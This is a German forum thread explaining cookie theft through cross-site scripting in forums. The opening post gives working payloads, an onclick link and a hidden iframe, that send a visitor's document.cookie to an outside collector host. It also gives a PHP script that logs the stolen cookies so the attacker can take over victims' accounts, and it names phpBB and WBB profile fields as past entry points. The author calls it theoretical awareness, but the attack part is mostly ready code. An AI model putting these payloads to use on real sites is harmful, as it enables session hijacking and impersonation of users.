per XSS hacken > Cookie Diebstahl in Websites / Foren

#1 Hallo,

vielen Webprogrammierern und Webmastern ist das Problem garnicht bewusst, daher hier mal ein Beispiel... (eventuell löst sich das Problem ja in Zukunft auch durch httponly Cookies)

theoretisches Beispiel
Man möchte den Cookie eines Users in einem Forum mitloggen, damit man diesen später verwenden kann um unter dem Namen des Opfers im Forum aktiv zu werden.

hierzu bedarf es einer Sicherheitslücke in einem Formular, sodass man z.B. irgendwo z.B. im eigenen Profil HTML einbinden und ausführen kann z.B.

einen präparierten Link

Code

<B onclick="location.href='http://www.hier-logge-ich.de/cookie_sammel_script.php?ref='+document.cookie"><a href="http://www.google.de/" target="_blank">Hallo Opfer click mal diesen Link</a></B>

oder einen Iframe

Code

document.write('<iframe height=1 width=1 src="http://www.hier-logge-ich.de/cookie_sammel_script.php?'+document.cookie+'"></iframe>');

sobald ein Opfer eine so manipulierte Seite aufruft wird sein Cookie an mein h**p://www.hier-logge-ich.de/cookie_sammel_script.php weitergegeben und bei mir gespeichert.

mein Cookie Sammel Script kann z.B. so aussehen:

PHP Code

<?php
$tada = rawurldecode ("$QUERY_STRING");
$logfile = "list.txt";

//open file for write
$fp = fopen ("$logfile", "w");
//print "The file does not exist";

// write the params as name value pairs
fputs ($fp, "$tada");
fputs ($fp, "\n\n");

// close the file
fclose($fp);
?>

die in meiner Textdatei gespeicherten Cookies kann ich frei verwenden und somit mit den gehijackten Accounts surfen!

in vielen Community Portalen / Foren besonders PHPBB ist ein solches "hacken" möglich. Das Protecus Board und auch das vbulletin ist meinen Tests nach gut gesichert!

Greetz Lp

#2 Na dan kannst Du uns ja wenigstens Verraten wo die sicherheitslücken in PHPBB Foren sind!?!?

#3

Zitat

Bones postete
Na dan kannst Du uns ja wenigstens Verraten wo die sicherheitslücken in PHPBB Foren sind!?!?

Na dann kann ich Dir ja verraten wo man wegen solcher Sicherheitslücken mal schauen könnte z.B.....

http://board.protecus.de/t26027.htm

TS

#4

Zitat

Bones postete
Na dan kannst Du uns ja wenigstens Verraten wo die sicherheitslücken in PHPBB Foren sind!?!?

siehe Antwort von TurnRstereO in deinem anderen Thema.

die von mir beschriebene Lücke hat sich lange Zeit in der Avatar Funktion z.b. vom WBB und früher auch vom PHPBB ausnutzen lassen (da konnte man im Profil beliebiges eingeben) ist aber inzwischen in eigentlich allen Foren behoben!

ausserdem sollte das keine Hackanleitung sein, sondern rein theoretisch veranschaulichen wo bei Foren Lücken entstehen und liegen können!

Greetz Lp

#5 Danke für die Info Laserpointa. Wenigstens einer der nem Anfänger eine normale Antworten auf eine Frage gibt.

Cheers,
Bones